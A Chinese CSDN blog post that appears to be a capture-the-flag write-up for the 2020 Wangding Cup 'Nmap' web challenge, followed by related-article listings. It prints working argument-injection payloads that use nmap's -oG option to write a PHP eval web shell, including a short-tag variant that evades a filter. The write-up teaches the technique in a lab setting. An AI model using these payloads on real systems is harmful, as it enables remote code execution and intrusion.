[网鼎杯 2020 朱雀组]Nmap

最新推荐文章于 2023-12-03 21:07:45 发布
最新推荐文章于 2023-12-03 21:07:45 发布
阅读量2.7k 收藏
点赞数 3
分类专栏: BUUCTF nmap 文章标签: nmap 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58784379/article/details/121286263
版权
BUUCTF 同时被 2 个专栏收录
30 篇文章 0 订阅
订阅专栏
nmap
8 篇文章 2 订阅
订阅专栏

这道题与[BUUCTF 2018]Online Tool的解题方式一些有些类似,都是利用nmap上传文件连接,主要考察nmap的一些用法

首先右击查看源码,提示flag在/flag下  

进行简单的ping操作

nmap下的选项

  • -oN 标准保存

  • -oX XML保存

  • -oG Grep保存

  • -oA 所有格式保存

构造payload:' <?php @eval($_POST["hack"]);?> -oG hack.php '

php被过滤,使用短标绕过后蚁剑连接

payload:' <?= @eval($_POST["ganyu"]);?> -oG gy.phtml '

链接:http://2a30223b-142b-4557-a92c-7bc56c2f39b0.node4.buuoj.cn:81/gy.phtml

密码:ganyu

bbb07
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网鼎杯青龙18道.rar
06-11
【标题】"网鼎杯青龙18道.rar"是一个关于网络安全竞赛的资源压缩包,其中包含了2020网鼎杯青龙的比赛题目。网鼎杯是一项知名的网络安全技术竞赛,旨在提升参赛者的网络安全技能和实战能力,尤其针对青龙,...
用mimiktz和nmap进行网络扫描
06-15
《mimiktz和nmap在网络扫描中的应用》 网络安全是一项至关重要的任务,尤其是在现代数字化社会中。本文将深入探讨如何使用mimiktz和nmap这两种强大的工具来进行网络扫描,以获取目标主机的登录账号信息,并通过不同...
BUUCTF [网鼎杯 2020 朱雀] Nmap
Senimo
12-09 3551
BUUCTF [网鼎杯 2020 朱雀] Nmap 考点:nmap -oG 写入文件、-iL读取扫描文件 解法:将nmap扫描结果写入文件时加入一句话木马 启动环境: 类似Nmap的功能,一个输入命令行,提示输入ip地址,尝试输入正常内容:127.0.0.1 可以得到回显结果,猜测是命令执行,尝试使用|分隔地址与命令 127.0.0.1 | ls 可以看到|被\转义,尝试使用;: 提示地址错误,尝试了一些其他的命令执行,也无法实现,参考 ...
[网鼎杯 2020 朱雀]Nmap(双解详细分析)
记录学习,一起进步
01-29 1042
[网鼎杯 2020 朱雀]Nmap
[网鼎杯 2020 朱雀]Nmap wp
qq_64201116的博客
08-24 800
2020朱雀杯]和的题目似乎是一样的,不同在于朱雀杯没有给出源码,主要考察的都是nmap一句话木马写入。本篇文章细致讲解输入时和两个函数所进行的步骤。
2020-网鼎杯-朱雀-Web-nmap
feng的博客
11-03 808
WP 和BUUCTF里的2018 Online Tool非常类似。 首先就是中是个nmap命令注入,有2个方式: 利用-oG,可以将命令和结果写进文件。 利用-iL 和-oN。其中-iL是从inputfilename文件中读取扫描的目标。在这个文件中要有一个主机或者网络的列表,由空格键、制表键或者回车键作为分割符。如果使用-iL-,nmap就会从标准输入stdin读取主机名字。你可以从指定目标一节得到更加详细的信息,-oN是把扫描结果重定向到一个可读的文件logfilename中。 关于escapesh
网络扫描工具-nmap与zmap
最新发布
12-28
本主题将深入探讨两种流行的网络扫描工具——nmap和zmap。 **nmap** nmap,全称为“Network Mapper”,是一款强大的开源网络探测和安全审计工具。它的主要功能包括: 1. **主机发现**:nmap通过发送特定的ICMP、...
nmap7.7.0,最新官网下载版本
01-19
最新下载的NMAP7.70,工具分享。使用更可靠更稳定。欢迎大家下载使用。
nmap nes脚本用法大全手记 网络攻防
01-24
500多个脚本用法详细说明和举例
nmap-7.91.rar
03-17
Nmap:网络扫描与安全探索的利器》 Nmap,全称为Network Mapper,是一款广泛应用于网络探索、安全审计及系统管理员日常维护的开源工具。它的最新稳定版本为"nmap-7.91",提供了自安装程序"nmap-7.91-setup.exe",...
最好的网络扫描仪 - nmap
01-23
最好的网络扫描仪 - nmap
nmap安装包,网络探针
08-22
nmap安装包,网络探针
Linux下网络探测工具nmap的使用
01-09
 Nmap(Network Mapper)是一款开放源代码的网络探测和安全审核工具。它用于快速扫描一个网络和一台主机开放的端口,还能使用TCP/IP协议栈特征探测远程主机的操作系统类型。nmap支持很多扫描技术,例如:UDP、TCP ...
BUUCTF: [网鼎杯 2020 朱雀]Nmap
末初的CSDN博客
09-21 1981
是可以执行的,可以先上线一个shell,然后在服务器中检查使用其他参数的结果。会将执行语句记录输出文件。控制输出文件内容以及文件格式就可以解析了。的文件无法写入,尝试写入一些可能会解析的其他文件后缀。使用输出格式可以将指定的内容输出到指定的文件格式。对传入的参数的保护(感觉有点点猜的意思。但是这里还有些过滤,比如过滤了关键字。会把扫描结果导出到一个文件里面。题目环境经过测试可以发现只有。,那说明导出的文件格式是。即便执行失败也无所谓,
[⽹鼎杯 2020 朱雀]Nmap
zzqzzq11的博客
12-03 412
要值得⼀提的是,这个弄完之后会有很多转译符,原因在于本来nmap就是执⾏相关的,因此很多都需要转译,⽐如 | > < { \ ' " 等等。这个题和上⾯那个nmap是⼀样的。只是过滤了下php罢了。其实就是参数值跳出来变成参数选项。细节之前已经说的差不多了。⽤phtml绕过就⾏。前⾯已经分析得很多了。
2020网鼎杯朱雀WEB——NMAP&PHPWEB
Pdsdt1的博客
05-18 4148
NMAP 考察的是比较老的知识点了,在BUU出现过的题目,nmap命令行参数注入 详细文章: https://blog.csdn.net/qq_26406447/article/details/100711933 访问题目,发现我们可以输入url,经过nmap扫描后会返回出结果,这里引入nmap命令中的一个参数 -oG #可以实现将命令和结果写到文件 源码大概的构造: echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host); 我们可以通过
[网鼎杯 2020 朱雀]nmap
03-16
nmap是一款网络扫描工具,可以用来扫描目标主机的开放端口、操作系统类型、服务版本等信息。它可以帮助安全人员评估网络安全状况,发现潜在的漏洞和攻击面。同时,nmap也可以用来管理网络,例如发现新设备、检查网络...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值